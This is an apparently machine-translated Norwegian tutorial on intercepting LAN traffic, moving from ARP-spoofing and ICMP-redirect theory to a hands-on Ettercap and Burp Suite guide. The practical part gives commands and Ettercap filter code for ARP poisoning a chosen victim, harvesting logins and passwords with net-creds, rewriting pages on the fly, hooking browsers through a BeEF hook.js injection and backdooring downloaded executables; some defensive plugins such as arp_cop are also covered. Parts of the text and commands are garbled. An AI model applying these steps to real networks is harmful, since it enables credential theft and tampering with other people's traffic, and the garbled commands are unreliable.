hjem › Installasjon og konfigurasjon › Hackere bruker den til å omdirigere trafikk. Metoder for hackerangrep. Dataspoofing med Burp

Hackere bruker den til å omdirigere trafikk. Metoder for hackerangrep. Dataspoofing med Burp

Metoder for å avskjære nettverkstrafikk

Å lytte til nettverket ved hjelp av nettverksanalysatorprogrammer er det første, mest på en enkel måte dataavskjæring.

For å beskytte mot nettverksavlytting, bruk spesielle programmer, for eksempel AntiSniff, som er i stand til å identifisere datamaskiner på nettverket som lytter til nettverkstrafikk.

For å løse problemene deres bruker antisniffer-programmer et spesielt tegn på tilstedeværelsen av lytteenheter på nettverket - nettverkskortet til snifferdatamaskinen må være i en spesiell lyttemodus. Mens de er i lyttemodus, reagerer nettverksdatamaskiner på en spesiell måte på IP-datagrammer som sendes til verten som testes. For eksempel behandler lyttende verter vanligvis all innkommende trafikk, ikke bare datagrammer som sendes til vertens adresse. Det er andre tegn som indikerer mistenkelig vertsatferd som AntiSniff kan gjenkjenne.

Utvilsomt er avlytting veldig nyttig fra en angripers synspunkt, siden det lar en få mye nyttig informasjon - passord som overføres over nettverket, adresser til nettverksdatamaskiner, konfidensielle data, brev, etc. Enkel avlytting tillater imidlertid ikke en hacker å forstyrre nettverkskommunikasjonen mellom to verter for å modifisere og korrupte data. For å løse et slikt problem kreves det mer kompleks teknologi.

Ris. 1 Falske ARP-forespørsler

La oss se hvordan en hacker kan bruke ARP til å avskjære nettverkskommunikasjon mellom vertene A og B.

For å avskjære nettverkstrafikk mellom vertene A og B påtvinger hackeren sin IP-adresse på disse vertene, slik at A og B bruker denne forfalskede IP-adressen når de utveksler meldinger. For å påtvinge sin IP-adresse, utfører hackeren følgende operasjoner.

Angriperen bestemmer MAC-adressene til vertene A og B, for eksempel ved å bruke kommandoen nbtstat fra W2RK-pakken.
Angriperen sender meldinger til de identifiserte MAC-adressene til vertene A og B, som er forfalskede ARP-svar på forespørsler om å løse vertens IP-adresser til MAC-adressene til datamaskiner. Vert A er informert om at IP-adressen til vert B tilsvarer MAC-adressen til angriperens datamaskin; vert B informeres om at IP-adressen til vert A også tilsvarer MAC-adressen til angriperens datamaskin.
Vert A og B lagrer de mottatte MAC-adressene i sine ARP-cacher og bruker dem deretter til å sende meldinger til hverandre. Siden IP-adressene A og B tilsvarer MAC-adressen til angriperens datamaskin, kommuniserer vertene A og B, intetanende, gjennom en mellommann som kan gjøre hva som helst med meldingene deres.

For å beskytte mot slike angrep, må nettverksadministratorer vedlikeholde en database med en samsvarstabell mellom MAC-adressene og IP-adressene til deres nettverksdatamaskiner.

På UNIX-nettverk kan denne typen falske ARP-forespørselsangrep implementeres ved å bruke systemverktøy for overvåking og administrasjon av nettverkstrafikk, for eksempel arpredirect. Dessverre ser ikke slike pålitelige verktøy ut til å være implementert på Windows-nettverk. På NTsecurity-nettstedet kan du for eksempel laste ned GrabitAII-verktøyet, presentert som et verktøy for å omdirigere trafikk mellom nettverksverter. En grunnleggende sjekk av funksjonaliteten til GrabitAII-verktøyet viser imidlertid at fullstendig suksess med å implementere funksjonene fortsatt er langt unna.

For å avskjære nettverkstrafikk kan en angriper forfalske den virkelige IP-adressen til en nettverksruter med sin egen IP-adresse, for eksempel ved å bruke forfalskede ICMP Redirect-meldinger. Vert A må, i henhold til RFC-1122, oppfatte den mottatte omdirigeringsmeldingen som et svar på et datagram sendt til en annen vert, for eksempel B. Vert A bestemmer sine handlinger på omdirigeringsmeldingen basert på innholdet i den mottatte omdirigeringsmeldingen, og hvis omdirigering av datagram er spesifisert i Omdirigering fra A til B langs en ny rute, er dette nøyaktig hva vert A vil gjøre.

Ris. 2 Falsk ruting

For å utføre falsk ruting, må angriperen vite noen detaljer om organisasjonen lokalt nettverk, der vert A befinner seg, spesielt IP-adressen til ruteren som trafikk sendes gjennom fra vert A til B. Ved å vite dette vil angriperen generere et IP-datagram der avsenderens IP-adresse er definert som ruterens IP adresse, og mottakeren er spesifisert vert A. Også inkludert i datagrammet er en ICMP Redirect-melding med adressefeltet til den nye ruteren satt til IP-adressen til angriperens datamaskin. Etter å ha mottatt en slik melding, vil vert A sende alle meldinger til IP-adressen til angriperens datamaskin.

For å beskytte mot et slikt angrep bør du deaktivere (for eksempel ved hjelp av en brannmur) behandlingen av ICMP Redirect-meldinger på vert A, og tracert-kommandoen (i Unix er dette tracerout-kommandoen) kan avsløre IP-adressen til angriperens datamaskin . Disse verktøyene er i stand til å finne en ekstra rute som har dukket opp på det lokale nettverket som ikke ble gitt under installasjonen, med mindre selvfølgelig nettverksadministratoren er årvåken.

Eksemplene ovenfor på avskjæringer (som angripernes evner er langt fra begrenset til) overbeviser om behovet for å beskytte data som overføres over nettverket hvis dataene inneholder konfidensiell informasjon. Den eneste metoden for beskyttelse mot avlytting av nettverkstrafikk er bruk av programmer som implementerer kryptografiske algoritmer og krypteringsprotokoller og forhindrer avsløring og erstatning av hemmelig informasjon. For å løse slike problemer gir kryptografi midler til å kryptere, signere og verifisere autentisiteten til meldinger som sendes over sikre protokoller.

Praktisk implementering av alle kryptografiske metoder for å beskytte informasjonsutveksling er levert av VPN-nettverk(Virtuelt privat nettverk - Virtuelle private nettverk).

TCP-tilkoblingsavskjæring

Det mest sofistikerte nebør betraktes som TCP-tilkoblingsfangst (TCP-kapring), når en hacker avbryter den nåværende kommunikasjonsøkten med verten ved å generere og sende TCP-pakker til den angrepne verten. Deretter, ved å bruke TCP-protokollens evne til å gjenopprette en avbrutt TCP-forbindelse, avskjærer hackeren den avbrutte kommunikasjonsøkten og fortsetter den i stedet for den frakoblede klienten.

TCP-protokollen (Transmission Control Protocol) er en av de grunnleggende transportprotokollene. OSI nivå, slik at du kan etablere logiske forbindelser over en virtuell kommunikasjonskanal. Over denne kanalen blir pakker sendt og mottatt med sekvensen registrert, strømmen av pakker kontrolleres, retransmisjon av forvrengte pakker organiseres, og på slutten av økten brytes kommunikasjonskanalen. TCP er den eneste protokollen grunnleggende protokoll fra TCP/IP-familien, som har et avansert meldingsidentifikasjon og tilkoblingssystem.

Oversikt over programvarepakkesniffer

Alle programvaresniffere kan deles inn i to kategorier: sniffere som støtter oppstart fra kommandolinje, og sniffere med et grafisk grensesnitt. Vi legger imidlertid merke til at det finnes sniffere som kombinerer begge disse egenskapene. I tillegg skiller sniffere seg fra hverandre i protokollene de støtter, dybden på analyse av avlyttede pakker, muligheten til å konfigurere filtre og muligheten for kompatibilitet med andre programmer.

Vanligvis vinduet til enhver sniffer med grafisk grensesnitt består av tre områder. Den første av dem viser sammendragsdataene for avskjærte pakker. Vanligvis viser dette området et minimum av felt, nemlig: pakkeavskjæringstid; IP-adressene til pakkens avsender og mottaker; MAC-adresser til avsender og mottaker av pakken, kilde- og destinasjonsportadresser; protokolltype (nettverk, transport eller applikasjonslag); noen sammendragsinformasjon om de avlyttede dataene. Det andre området viser statistisk informasjon om den individuelle valgte pakken, og til slutt viser det tredje området pakken i heksadesimal eller ASCII-tegnform.

Nesten alle pakkesniffer lar deg analysere dekodede pakker (det er grunnen til at pakkesniffer også kalles pakkeanalysatorer, eller protokollanalysatorer). Snifferen distribuerer oppfangede pakker på tvers av lag og protokoller. Noen pakkesniffer er i stand til å gjenkjenne protokollen og vise den fangede informasjonen. Denne typen informasjon vises vanligvis i det andre området av sniffervinduet. For eksempel kan enhver sniffer gjenkjenne TCP-protokollen, og avanserte sniffere kan bestemme hvilken applikasjon som genererte denne trafikken. De fleste protokollanalysatorer gjenkjenner over 500 forskjellige protokoller og kan beskrive og dekode dem ved navn. Jo mer informasjon en sniffer kan dekode og vise på skjermen, jo mindre må dekodes manuelt.

Et problem som pakkesniffer kan støte på er manglende evne til å identifisere en protokoll på riktig måte ved å bruke en annen port enn standardporten. For å forbedre sikkerheten kan for eksempel noen velkjente applikasjoner konfigureres til å bruke andre porter enn standardportene. Så i stedet for den tradisjonelle porten 80 reservert for webserveren, denne serveren Du kan tvangskonfigurere den til port 8088 eller en hvilken som helst annen. Noen pakkeanalysatorer i denne situasjonen er ikke i stand til å bestemme protokollen riktig og viser kun informasjon om protokollen på lavere nivå (TCP eller UDP).

Det finnes programvaresniffere som følger med programvareanalysemoduler som plugins eller innebygde moduler som lar deg lage rapporter med nyttig analytisk informasjon om avlyttet trafikk.

Et annet karakteristisk trekk ved de fleste programvarepakkeanalysatorer er muligheten til å konfigurere filtre før og etter at trafikk er fanget opp. Filtre velger visse pakker fra den generelle trafikken i henhold til et gitt kriterium, noe som lar deg bli kvitt unødvendig informasjon når du analyserer trafikk.

Alternativer til Ettercap

Ettercap er den mest populære mann-i-midten-angrepsprogramvaren, men er den den beste? Gjennom hele instruksjonene vil du se at Ettercap nesten aldri brukes alene, at et eller annet program alltid bygges med det i en trafikkbehandlingskjede. Kanskje gir dette fleksibilitet; generelt sett er denne tilnærmingen grunnlaget for UNIX - ett program utfører én oppgave, og sluttbrukeren kombinerer ulike programmer for å oppnå ønsket resultat. Med denne tilnærmingen er programkoden enklere å vedlikeholde; fra slike miniatyr-"klosser" kan du bygge et system av enhver kompleksitet og fleksibilitet. Imidlertid er det ikke veldig praktisk å ha fem åpne konsoller med forskjellige oppgaver, hvor programmer er rettet mot å oppnå ett enkelt resultat, det er rett og slett mer komplisert, det er en mulighet for å gjøre en feil på et tidspunkt, og hele konfigurert systemet vil fungere forgjeves.

Net-Creds sniff:

Besøkte nettadresser
POST-forespørsler sendt
pålogginger/passord fra HTTP-skjemaer
pålogginger/passord for grunnleggende HTTP-autentisering
HTTP-oppslag
FTP-pålogginger/passord
IRC-pålogginger/passord
POP-pålogginger/passord
IMAP-pålogginger/passord
Telnet-pålogginger/passord
SMTP-pålogginger/passord
SNMP-fellesskapsstreng
alle støttede NTLMv1/v2-protokoller som HTTP, SMB, LDAP, etc.
Kerberos

Et godt utvalg av avlyttede, og drivgarn er enklere i denne forbindelse - det viser kun avlyttede bilder.

Bytt maskinen til videresendingsmodus.

Ekko "1"> /proc/sys/net/ipv4/ip_forward

Start Ettercap med et grafisk grensesnitt (-G):

Ettercap-G

Velg nå Verter, det er et underelement Skann etter verter. Etter at skanningen er fullført, velg Vertsliste:

Som Target1, velg ruteren (Add to Target 1), som Target2 velg enheten du vil angripe (Add to Target 2).

Men her kan det første haken oppstå, spesielt hvis det er mange verter. I forskjellige instruksjoner, inkludert i videoen presentert ovenfor, klatrer forfatterne inn i målmaskinen (alle, av en eller annen grunn, har Windows) og ved hjelp av kommandoen ser de på IP-en til denne maskinen på det lokale nettverket. Enig, dette alternativet er uakseptabelt for reelle forhold.

Hvis du skanner med , kan du få noen Ytterligere informasjon om verter, mer presist, om nettverkskortprodusenten:

Nmap -sn 192.168.1.0/24

Hvis dataene fortsatt ikke er nok, kan du gjøre en skanning for å finne operativsystemet:

Nmap -O 192.168.1.0/24

Som vi kan se, viste det seg at maskinen med IP 192.168.1.33 var Windows, hvis dette ikke er et tegn ovenfra, hva er det så? 😉 LOL

Dette er det vi legger til som et andre mål.

Gå nå til menypunktet Mitm. Der, velg ARP-forgiftning... Kryss av i boksen for Sniff-fjerntilkoblinger.

Vi begynner å høste, i ett vindu lanserer vi

Netto-creds

i en annen (begge programmer kan kjøres uten alternativer)

Drivnett

Datainnsamlingen startet umiddelbart:

På høyre side har drivgarn åpnet et annet vindu der det viser de avlyttede bildene. I net-creds-vinduet ser vi besøkte nettsteder og oppfangede passord:

1.2 Ettercap + Burp Suite
3. Se data (besøkte nettsteder og registrerte passord) i Ettercap

I Vis-menyen har vi tilgang til fanene Tilkoblinger og Profiler. Du kan også merke av for Løs IP-adresser. Forbindelser er selvfølgelig forbindelser. Ettercap samler profiler i minnet for hver vert den oppdager. Der samles brukere og passord. I dette tilfellet er profiler med registrerte kontodata (passord) merket med et kryss:

Det er ikke nødvendig å stole for mye på profiler - for eksempel er avlyttede pålogginger og passord for FTP og andre tjenester merket, som programmet tydelig kan tolke informasjonen som mottas som legitimasjon. Dette inkluderer for eksempel ikke grunnleggende autentiseringsdata, pålogginger og passord som legges inn i nettskjemaer.

I Connections er de mest lovende dataene merket med en stjerne:

Du kan dobbeltklikke på disse oppføringene for å se detaljer:

For ikke å søke etter disse stjernene i listen, kan du sortere etter dette feltet, og de vil alle vises øverst eller nederst:

Fanget grunnleggende autentisering:

Påloggingspassord for Yandex (uthevet nedenfor):

Dette er de avlyttede legitimasjonene for VKontakte:

Dessuten er de mest interessante dataene samlet i den nedre konsollen:

Hvis du vil lagre resultatene av programmet, bruk disse alternativene (spesifiser nøklene når du starter Ettercap:

Loggingsalternativer: -w, --write skriv fangede data til pcapfile -L, --log skriv all trafikk til denne -l, --log-info skriv kun passiv informasjon til denne -m, --log-msg skriv alle meldinger i denne -c, --compress bruk gzip-komprimering for loggfiler

4. On-the-fly dataerstatning i Ettercap
4.1 Bruke Ettercap tilpassede filtre

Merk: Til tross for all testing, fungerte Ettercap-filtrene fortsatt ikke for meg. Det er vanskelig å forstå om det er et spørsmål om hender, maskinvarefunksjoner eller en feil i selve programmet... Men for versjon 0.8.2 (den siste for øyeblikket) er det en feilrapport om problemer med filtre. Generelt, etter feilrapporter og fora, faller filtre ofte av eller har ikke fungert i det hele tatt på lenge. Det er en gren der endringer ble gjort for 5 måneder siden https://github.com/Ettercap/ettercap/tree/filter-improvements, dvs. filterforbedringer (med filterforbedringer). Både for denne grenen og for versjonen fra depotet ble det laget en lang rekke tester, forskjellige filtre ble testet under forskjellige forhold, mye tid ble brukt, men det ble ikke noe resultat. Forresten, for å installere filterforbedringsversjonen i Kali Linux må du gjøre dette:

Sudo apt-get remove ettercap-graphical ettercap-common sudo apt-get install git debhelper bison check cmake flex ghostscript libbsd-dev libcurl4-openssl-dev libgtk2.0-dev libltdl-dev libluajit-5.1-dev libncurses5-dev libncurses5-dev libncurses5-dev libpcap-dev libpcre3-dev libssl-dev libgtk-3-dev ghostscript groff libtool libpcre3 libncurses5-dev git clone -b filter-improvements https://github.com/Ettercap/ettercap.git cd ettercap/ cmPDadir_DOCS build_cd =På ../ gjør sudo make install

Generelt, hvis filtrene dine ikke fungerer, er du ikke alene. I instruksjonene om Ettercap kan jeg ikke hoppe over temaet filtre, så de vil bli diskutert i alle fall.

Så langt har vi brukt Ettercap for ARP-spoofing. Dette er en veldig overfladisk applikasjon. Takket være egendefinerte filtre kan vi gripe inn og endre trafikk på farten. Filtre må finnes i separate filer og må kompileres ved hjelp av Etterfilter-programmet før bruk. Selv om dokumentasjonen som koblingen er gitt til virker lite, men kombinert med eksemplene gitt nedenfor, vil det tillate deg å skrive ganske interessante filtre.

La oss lage vårt første filter, det vil erstatte alle bilder med dette:

I en fil kalt img_replacer.filter kopi:

If (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "Accept-Encoding")) ( replace("Accept-Encoding", "Accept-Rubbish!"); # merk: erstatningsstrengen har samme lengde som den originale msg("zapped Accept-Encoding!\n"); ) ) if (ip.proto == TCP && tcp.src == 80) ( replace("src=" , " src=\"http://www.irongeek.com/images/jollypwn.png\" "); replace("SRC=", "src=\"http://www.irongeek.com/images/ jollypwn. png\" "); replace("src =", "src=\"http://www.irongeek.com/images/jollypwn.png\" "); replace("SRC =", "src= \" http://www.irongeek.com/images/jollypwn.png\" "); msg("Filter kjørt.\n"); )

Kompiler filen:

Etterfilter img_erstatter.filter -o img_erstatter.ef

Samlingsresultater:

Etterfilter 0.8.2 copyright 2001-2015 Ettercap Development Team 14 protokolltabeller lastet inn: DEKODEDE DATA udp tcp esp gre icmp ipv6 ip arp wifi fddi tr eth 13 konstanter lastet: VRRP OSPF GRE UDP TCP ESP ICMP6 APP kilde PPP IPP 6 kilde "img_replacer.filter" ferdig. Utfolding av meta-treet ferdig. Konvertering av etiketter til reelle forskyvninger utført. Skrive utdata til "img_replacer.ef" ferdig. -> Skript kodet inn i 18 instruksjoner.

-F-bryteren forteller programmet å laste inn filteret fra filen som følger bryteren. Etter kompilering er navnet på vår nye fil med filteret img_replacer.ef, så kommandoen har formen:

Ettercap -G -F img_replacer.ef

Merk: Når du overvåker nettrafikk, kan pakkene du ser, være i kryptert form. Til effektivt arbeid filtre, trenger Ettercap trafikk i skjemaet ren tekst. I følge noen observasjoner er kodingstypen som nettsider bruker "Accept-Encoding: gzip, deflate"

Nedenfor er et filter som overskriver kodingen, og tvinger kommunikasjon i form av ren tekst:

If (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "gzip")) ( replace("gzip", " "); # merk: fire mellomrom i den erstattede strengen msg ("whiteed out gzip\n"); ) ) if (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "deflate")) ( replace("deflate", " "); # merknad: syv mellomrom i den erstattede linjen msg("whiteed out deflate\n"); ) )

Syntaksen for å skrive filtre er beskrevet i detalj, og så er det noen flere eksempler:

# erstatte tekst i en pakke: if (ip.proto == TCP && search(DATA.data, "lol"))( replace("lol", "smh"); msg("filter kjørte"); ) # show melding , hvis tcp-porten er 22 if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( msg("SSH-pakke\n"); ) ) # skriv ned hele telnet-trafikken, kjør også ./program for hver pakke if (ip.proto == TCP) ( if (tcp.src == 23 || tcp.dst == 23) ( log(DATA.data, "./ logfile.log "); exec("./program"); ) ) # logg all trafikk unntatt http if (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) ( log (DATA.data , "./logfile.log"); ) # noen operasjoner på pakkens nyttelast if (DATA.data + 20 == 0x4142) ( DATA.data + 20 = 0x4243; ) else ( DATA.data = " modified"; DATA .data + 20 = 0x4445; ) # slipp alle pakker som inneholder "ettercap" if (search(DECODED.data, "ettercap")) ( msg("noen snakker om oss...\n") ; drop( ); kill(); ) # post dekrypterte ssh-pakker som samsvarer med det regulære uttrykket if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( if (regex(DECODED.data, ".*login.*")) ( log(DECODED.data, "./decrypted_log"); ) ) ) # killing packs if (ip.ttl< 5) { msg("The packet will die soon\n"); } # то же самое для IPv6, но делая тривиальный тест убеждаемся, что перед нами действительно IPv6 пакеты if (eth.proto == IP6 && ipv6.hl < 5) { msg("The IPv6 packet will die soon\n"); } # сравнение строки на данный сдвиг if (DATA.data + 40 == "ette") { log(DATA.data, "./logfile"); } # вставить файл после указанного пакета if (tcp.src == 21 && search(DATA.data, "root")) { inject("./fake_response"); } # целиком заменить пакет на другой if (tcp.src == 23 && search(DATA.data, "microsoft")) { drop(); inject("./fake_telnet"); } # Изменение бинарных данных используя внешнюю программу if (udp.dst == 53 && pcre_regex(DATA.data, ".*\x03com\x00.*")) { log(DATA.data, "/tmp/payload"); drop(); execinject("/bin/sed "s/\x03com\x00/\x02my\x04page\x02de\x00/g" /tmp/payload"); udp.len += 7; exec("/bin/rm /tmp/payload"); msg("faked"); } # фильтровать только указанный IP адрес if (ip.src == "192.168.0.2") { drop(); } # делать то же самое для IPv6 if (ipv6.src == "2001:db8::1") { drop(); } # комбинируем IPv4 и IPv6 if (eth.proto == IP && ip.dst == "192.168.0.2") { msg("drop IPv4"); drop(); } if (eth.proto == IP6 && ipv6.dst == "2001:db8::1") { msg("drop IPv6"); drop(); } # транслировать tcp пакеты с порта 80 на 81 if (tcp.dst == 80) { tcp.dst -= 1; tcp.dst += 2; } # найти и покалечить пакеты ESP if (ip.proto == ESP) { DATA.data = "DEADDECAF"; }

4.2 Dataerstatning ved bruk av Burp

Vi lanserer Ettercap og Burp som beskrevet i avsnitt 1.2 eller i avsnitt 2.2.

I Burp, gå til Proxy -> Alternativer. Vi finner Match and Replace der. Klikk på Legg til for å legge til en ny regel.

Forespørselstopp er forespørselshodet
Request body - request body
Response header - response header
Response body - response body
Forespørselparameternavn - Forespørselsparameternavn
Forespørselparameterverdi - Forespørselsparameterverdi
Forespørsel første linje - Første linje i forespørselen

Hvis du trenger å endre dataene som overføres med GET-metoden, gjelder dette for overskrifter.

I HTML-markering er det også noe som heter head (head tag). De som er nevnt ovenfor har ingenting med denne tittelen å gjøre. Litt høyere snakker vi om pakkehoder. Hvis du ønsker å endre innholdet HTML-sider, så bør du alltid velge Response body i stedet for Request header, selv om du skal endre innholdet i head-taggen (for eksempel tittelen).

Hvis du ikke er kjent med vanlig uttrykk, da er det i prinsippet ingenting å bekymre seg for: HTML tilgir mye, og det det ikke forstår, ignorerer det ganske enkelt - du kan bruke det. Hvis du vet hvordan du bruker regulære uttrykk, så respekterer jeg deg.)))

La oss for eksempel lage en ny regel, og endre forespørselshode til svartekst. I selve regelen vil vi endre

Uten tittel

Merk av for Regex-kampboksen.

Nå på alle nettsteder (uten HTTPS) vil tittelen være Ingen tittel:

Sett inn en vilkårlig linje etter body-taggen (det vil være den første linjen i teksten). Forespørselshode endres til Svartekst. Vi forandrer oss

Merk av for Regex-kampboksen.

I øvre høyre hjørne (avhengig av oppsettet) vises inskripsjonen "Jeg er kul!". Du kan sette inn CSS, JavaScript-kode, hvilken som helst tekst - hva som helst. Du kan generelt fjerne alt fra siden, og deretter fylle den med ditt eget innhold – alt avhenger av fantasien din.

Ideen var å endre hvert skjema litt slik at dataene ble sendt til den opprinnelige serveren og til angriperens server (implementer multi-submit for hvert skjema). Men etter å ha begrunnet at hvis de overførte dataene ikke er kryptert og vi har tilgang til dem, så vi allerede ser det, er det ikke nødvendig å sende det til noen server. Men hvis noen trenger et virkelig fungerende eksempel på å sende data fra ett skjema til flere servere samtidig.

5. Oppkobling på BeEF

For å begynne å bruke funksjonene til BeEF, må vi legge inn en JavaScript-fil i HTML-koden, vanligvis en linje som:

De neste to metodene er bare forskjellige i metoden for å bygge inn denne strengen.

5.1 Koble til BeEF ved hjelp av Ettercap-filtre

[del skal utarbeides senere]

5.2 Koble til BeEF med Burp

Du må starte nøyaktig som skrevet i avsnitt 4.2. Bare i stedet for å erstatte overskrifter og legge til tekst på nettstedet, implementerer vi JavaScript-kode i form av en linje:

I mitt tilfelle er denne filen tilgjengelig på IP 192.168.1.36 på port 3000. Filen heter hook.js (kan endres i innstillingene). De. i mitt tilfelle må jeg injisere linjen:

Dette kan for eksempel gjøres ved å lage en ny regel, endre Forespørselstopp til Svartekst. Erstatning må skje i selve HTML-koden

Flott, når du åpner et nettsted som ikke har HTTPS, settes JavaScript-kode inn i HTML-koden, som lar deg samle informasjon gjennom en hektet nettleser og utføre ulike angrep:

6. Infeksjon med bakdører

Du kan erstatte og infisere kjørbare filer ved å bruke både Ettercap-filtre [som av en eller annen grunn ikke lenger fungerer] og ved å bruke tredjepartsapplikasjoner. For eksempel kan BDFProxy gjøre dette på fly. Dessverre er BDFProxy fortsatt på vei etter Backdoor Factory-oppdateringen fra april 2016: libmproxy-pakken ble omdøpt til mitmproxy i Python. For BDFProxy er libmproxy-pakken en nødvendig avhengighet; uten denne pakken vil ikke programmet starte. Derfor, nå, før "reparasjonen" av BDFProxy, er det umulig å bruke det, fordi selv med Backdoor Factory installert, klager BDFProxy-programmet over fraværet av libmproxy-biblioteket ...

En lignende operasjon kan gjøres med Burp Suite. Trinn-for-trinn-algoritmen presenteres; det gir ingen mening å skrive den om igjen i denne delen.

7. Bruke Ettercap plugins

Informasjon om Ettercap-plugins kan bli funnet. Det er ganske mange plugins; de som er beskrevet nedenfor virker for meg de mest interessante.

Plugins kan kobles til når Ettercap er lansert, det er et alternativ for dette:

P, --plugin kjør dette

Plugins kan også lastes fra GUI:

[MATERIAL UNDER FORBEREDELSE]

7.1 arp_cop

Den rapporterer mistenkelig ARP-aktivitet ved å passivt overvåke ARP-forespørsler/svar. Den kan rapportere ARP-forgiftningsforsøk eller enkle IP-konflikter eller IP-endringer. Hvis du bygger en første liste over verter, vil plugin-en fungere mer nøyaktig.

Ettercap -TQP arp_cop //

Et eksempel på reell deteksjon av ARP-spoofing:

Utvide

Mial@HackWare-Mint ~ $ sudo ettercap -TQP arp_cop // passord for mial: ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team Lytter på: eth0 -> 08:00:27:A3:08:4A 192.168.13. 255.255.255.0 fe80::a00:27ff:fea3:84a/64 SSL-disseksjon trenger et gyldig "redir_command_on"-skript i etter.conf-filen. Privilegier droppet til EUID 65534 EGID 65534... 33 port protokoll overvåker 4270 mac protokoll 4270 port protokoll overvåker leverandør fingeravtrykk 1766 tcp OS fingeravtrykk 2182 kjente tjenester Randomisering av 255 verter for skanning... Skanner hele nettmasken for 255 verter... * |===================== =============================>| 100,00 % 3 verter lagt til i vertslisten... Starter enhetlig sniffing... Bare tekst Grensesnitt aktivert... Trykk "h" for innebygd hjelp Aktiverer arp_cop-plugin... arp_cop: plugin kjører... arp_cop: (ny vert ) 192.168.1.1 arp_cop: (ADVARSEL) 192.168.1.35 utgir seg for å være 192.168.1.1 arp_cop: (ADVARSEL) 192.168.1.35 utgir seg for å være 192.168.1.1c. 192.168.1c. slutter å være 192.168.1.1 arp_cop: (ADVARSEL ) 192.168.1.35 utgir seg for å være 192.168.1.1 arp_cop: (ADVARSEL) 192.168.1.35 utgir seg for å være 192.168.1.1 arp_cop: (ADVARSEL) 192.168.1.1 til 192.168.1.1 til 9.168.21. ADVARSEL) 192.168.1.35 later til å være 192.168 .1.1 arp_cop: (ADVARSEL) 192.168.1.35 later til å være 192.168.1.1 arp_cop: (ADVARSEL) 192.168.1.35 later til å være 192.168.1.1 arp_cop: 192.168.1.1. 168 .1.1 arp_cop: (ADVARSEL) 192.168 .1.35 utgir seg for å være 192.168.1.1 arp_cop: (ADVARSEL) 192.168.1.35 utgir seg for å være 192.168.1.1 arp_cop: (ADVARSEL) 192.168.1.35 utgir seg for å være 192.168.1.35 168 .1.35 utgir seg for å være 192.168.1.1 arp_cop: (ADVARSEL) 192.168.1.35 utgir seg for å være 192.168.1.1 arp_cop: (ADVARSEL) 192.168.1.35 utgir seg for å være 192.168.1.1 arp_cop: (ADVARSEL) 192.168.1.81 til. .1 arp_cop: (ADVARSEL) 192.168.1.35 utgir seg for å være 192.168.1.1 arp_cop: (ADVARSEL) 192.168.1.35 utgir seg for å være 192.168.1.1 arp_cop: (ADVARSEL) 192.168.1.35 utgir seg for å være 192.168.16. 192.18.16.6p 35 later til å være 192.168.1.1 arp_cop : (ADVARSEL) 192.168.1.35 utgir seg for å være 192.168.1.1 arp_cop: (ADVARSEL) 192.168.1.35 utgir seg for å være 192.168.1.1 arp_cop: (ADVARSEL) 191.616 til 191.616 pretends 191.615 191.615. _cop: ( ADVARSEL) 192.168.1.35 later som å være 192.168.1.1 arp_cop: (ADVARSEL) 192.168.1.35 later til å være 192.168.1.1 arp_cop: (ADVARSEL) 192.168.1.35 later til å være 192.168.1.1c. 192.168.1c. ender på 192. 168.1.1 arp_cop: (ADVARSEL) 192.168.1.35 utgir seg for å være 192.168.1.1 arp_cop: (ADVARSEL) 192.168.1.35 later til å være 192.168.1.1 arp_1.6 til 192.168.16. 92. 168.1.1 arp_cop: ( ADVARSEL) 192.168.1.35 utgir seg for å være 192.168.1.1 arp_cop: (ADVARSEL) 192.168.1.35 utgir seg for å være 192.168.1.1 arp_cop: (ADVARSEL) 192.168.1.35 later til å være 192.168.1.1 arp_cop: (ADVARSEL) 192.168.1cop. : (ADVARSEL) 192.168.1.35 later til å være 192.168. 1.1 arp_cop: (ADVARSEL) 192.168.1.35 utgir seg for å være 192.168.1.1 arp_cop: (ADVARSEL) 192.168.1.35 utgir seg for å være 192.168.1.1.8.11.168.11. s skal være 192.168. 1.1 arp_cop: (ADVARSEL) 192.168. 1.35 utgir seg for å være 192.168.1.1 arp_cop: (ADVARSEL) 192.168.1.35 utgir seg for å være 192.168.1.1 arp_cop: (ADVARSEL) 192.168.13.13.13 til 192.168.13 til 13.13. ARNING) 192.168. 1.35 later til å være 192.168. 1.1 ...................................

7.2 autoadd

Den vil automatisk legge til nye ofre når de kobler seg til ARP-forgiftnings-mitm-angrepet. Den ser etter ARP-forespørsler på det lokale nettverket, og hvis det oppdages, vil plugin legge verten til listen over ofre hvis listen ble spesifisert som et TARGET. Verten legges til når en arp-forespørsel er synlig fra den.

7,3 chk_gift

Den sjekker om arp etch-moduler i ettercap er vellykkede. Den sender falske ICMP-ekkopakker til alle lokkeofre mens den utgir seg for å være hvert enkelt offer. Den kan fange et ICMP-svar med MAC-adressen vår som destinasjon, noe som betyr at lokket mellom de to målene er vellykket. Den sjekker begge banene til hver tilkobling.

7.4 dns_spoof

Denne plugin-en avbryter DNS-forespørsler og svarer med et falskt (falsk) svar. Du kan velge hvilken adresse plugin-en skal svare på ved å redigere etter.dns-filen. Programtillegget fanger opp A-, AAAA-, PTR-, MX-, WINS-, SRV- og TXT-forespørsler. Hvis det var en A-forespørsel, slås navnet opp i filen og IP-adressen returneres (du kan bruke jokertegn i navnet).

Det samme gjelder for AAAA-forespørsler.

7.5 find_conn

En veldig enkel plugin som lytter etter ARP-forespørsler for å vise deg alle målene som verten ønsker å kommunisere med. Det kan også hjelpe deg med å finne adresser på ukjente LAN.

Ettercap -TQzP find_conn ettercap -TQu -i eth0 -P find_conn

7.6 find_ettercap

Prøver å identifisere ettercap-pakker sendt til LAN. Det kan være nyttig for å identifisere noen som prøver å bruke ettercap. Ikke stol 100 % på det, siden testene bare fungerer på spesifikke sekvenser/ID-nummer.

7.7 scan_poisoner

Skal sjekke om det er noen som lokker mellom noen av vertene på listen og oss. Først sjekker den om to verter i listen har det samme mac adresse. Dette kan bety at en av dem forgifter oss ved å utgi seg for å være den andre. Det kan generere mange falske positiver i et proxy-arp-miljø. Du må lage en liste over verter for å utføre denne kontrollen. Etter det sender den icmp-ekkopakker til hver vert i listen og sjekker om mac-adressen til svarkilden er forskjellig fra adressen vi lagret i listen med den IP-en. Dette kan bety at noen lokker denne verten ved å late som om de har IP-adressen vår og videresender de avlyttede pakkene til oss. Du kan ikke kjøre denne aktive testen i ustøtende modus.

